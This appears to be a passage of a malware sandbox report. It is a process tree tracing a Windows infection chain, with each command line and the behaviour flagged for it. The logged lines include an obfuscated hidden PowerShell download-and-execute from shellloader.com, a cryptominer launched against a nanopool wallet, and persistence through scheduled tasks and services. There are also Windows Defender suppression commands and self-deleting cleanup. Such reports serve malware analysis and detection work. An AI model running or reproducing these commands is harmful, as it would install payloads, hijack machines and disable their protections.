C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit10⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'11⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"10⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth10⤵
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\8043795.exe"C:\ProgramData\8043795.exe"9⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
-
C:\ProgramData\5958877.exe"C:\ProgramData\5958877.exe"9⤵
- Suspicious use of SetThreadContext
-
C:\ProgramData\5958877.exe"C:\ProgramData\5958877.exe"10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7132 -s 94010⤵
- Program crash
-
C:\ProgramData\4203002.exe"C:\ProgramData\4203002.exe"9⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"10⤵
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4204 -s 8049⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4204 -s 8409⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4204 -s 8849⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4204 -s 8969⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4204 -s 9249⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4204 -s 8209⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\askinstall58.exe"C:\Users\Admin\AppData\Local\Temp\askinstall58.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecMik18.exe"C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecMik18.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\tmpB21F_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpB21F_tmp.exe"9⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\tmpB21F_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmpB21F_tmp.exe10⤵
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-QUJ87.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-QUJ87.tmp\setup_2.tmp" /SL5="$50138,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
-
C:\Users\Admin\AppData\Local\Temp\is-8UH0K.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-8UH0K.tmp\setup_2.tmp" /SL5="$2035E,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT11⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-LD5KK.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-LD5KK.tmp\postback.exe" ss112⤵
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe ss113⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"15⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\QxXRsvvqO.dll"14⤵
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\QxXRsvvqO.dll"15⤵
- Loads dropped DLL
-
C:\Windows\system32\regsvr32.exe/s "C:\Users\Admin\AppData\Local\Temp\QxXRsvvqO.dll"16⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\QxXRsvvqO.dllsfcmYduqe.dll"14⤵
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\QxXRsvvqO.dllsfcmYduqe.dll"15⤵
- Loads dropped DLL
-
C:\Windows\system32\regsvr32.exe/s "C:\Users\Admin\AppData\Local\Temp\QxXRsvvqO.dllsfcmYduqe.dll"16⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a9⤵
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat20ed203af5.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat20ed203af5.exeSat20ed203af5.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\7541406.scr"C:\Users\Admin\AppData\Roaming\7541406.scr" /S7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\5875517.scr"C:\Users\Admin\AppData\Roaming\5875517.scr" /S7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\5125044.scr"C:\Users\Admin\AppData\Roaming\5125044.scr" /S7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\5125044.scr"C:\Users\Admin\AppData\Roaming\5125044.scr"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 9408⤵
- Program crash
-
C:\Users\Admin\AppData\Roaming\3040445.scr"C:\Users\Admin\AppData\Roaming\3040445.scr" /S7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat2077373f11706fb7.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat2077373f11706fb7.exeSat2077373f11706fb7.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat20de8d8504.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat200240b71b.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat200240b71b.exeSat200240b71b.exe6⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 9327⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat2026ef0d60b87a3f5.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat2026ef0d60b87a3f5.exeSat2026ef0d60b87a3f5.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat2026ef0d60b87a3f5.exeC:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat2026ef0d60b87a3f5.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat2026ef0d60b87a3f5.exeC:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat2026ef0d60b87a3f5.exe7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat20545a92617f.exe /mixone5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat20627fa1c49.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\A48E.exeC:\Users\Admin\AppData\Local\Temp\A48E.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\DCC6.exeC:\Users\Admin\AppData\Local\Temp\DCC6.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\DCC6.exeC:\Users\Admin\AppData\Local\Temp\DCC6.exe3⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\7b094cea-f672-4562-9e16-411086b96df0" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\DCC6.exe"C:\Users\Admin\AppData\Local\Temp\DCC6.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\DCC6.exe"C:\Users\Admin\AppData\Local\Temp\DCC6.exe" --Admin IsNotAutoStart IsNotTask5⤵
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\4c228ff9-322f-4a90-b999-cce4a298d53a\build2.exe"C:\Users\Admin\AppData\Local\4c228ff9-322f-4a90-b999-cce4a298d53a\build2.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\4c228ff9-322f-4a90-b999-cce4a298d53a\build2.exe"C:\Users\Admin\AppData\Local\4c228ff9-322f-4a90-b999-cce4a298d53a\build2.exe"7⤵
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\4c228ff9-322f-4a90-b999-cce4a298d53a\build2.exe" & del C:\ProgramData\*.dll & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f9⤵
- Executes dropped EXE
- Loads dropped DLL
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\FE0A.exeC:\Users\Admin\AppData\Local\Temp\FE0A.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\1E74.exeC:\Users\Admin\AppData\Local\Temp\1E74.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\1E74.exe"3⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\6419.exeC:\Users\Admin\AppData\Local\Temp\6419.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\BA78.exeC:\Users\Admin\AppData\Local\Temp\BA78.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\D8FD.exeC:\Users\Admin\AppData\Local\Temp\D8FD.exe2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\D8FD.exe"3⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\3CD9.exeC:\Users\Admin\AppData\Local\Temp\3CD9.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\3CD9.exeC:\Users\Admin\AppData\Local\Temp\3CD9.exe3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\4769.exeC:\Users\Admin\AppData\Local\Temp\4769.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\4769.exeC:\Users\Admin\AppData\Local\Temp\4769.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\BC4C.exeC:\Users\Admin\AppData\Local\Temp\BC4C.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\72AC.exeC:\Users\Admin\AppData\Local\Temp\72AC.exe2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\qinbwhni\3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ushtnjuk.exe" C:\Windows\SysWOW64\qinbwhni\3⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create qinbwhni binPath= "C:\Windows\SysWOW64\qinbwhni\ushtnjuk.exe /d\"C:\Users\Admin\AppData\Local\Temp\72AC.exe\"" type= own start= auto DisplayName= "wifi support"3⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description qinbwhni "wifi internet conection"3⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start qinbwhni3⤵
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul3⤵
-
C:\Users\Admin\AppData\Local\Temp\7916.exeC:\Users\Admin\AppData\Local\Temp\7916.exe2⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\D9E4.exeC:\Users\Admin\AppData\Local\Temp\D9E4.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\EACD.exeC:\Users\Admin\AppData\Local\Temp\EACD.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Users\Admin\AppData\Local\Temp\2EA.exeC:\Users\Admin\AppData\Local\Temp\2EA.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\905.exeC:\Users\Admin\AppData\Local\Temp\905.exe2⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\A8C5.exeC:\Users\Admin\AppData\Local\Temp\A8C5.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Roaming\ustucsuC:\Users\Admin\AppData\Roaming\ustucsu2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\wjichPy.exeC:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\wjichPy.exe W8 /site_id 668658 /S2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows 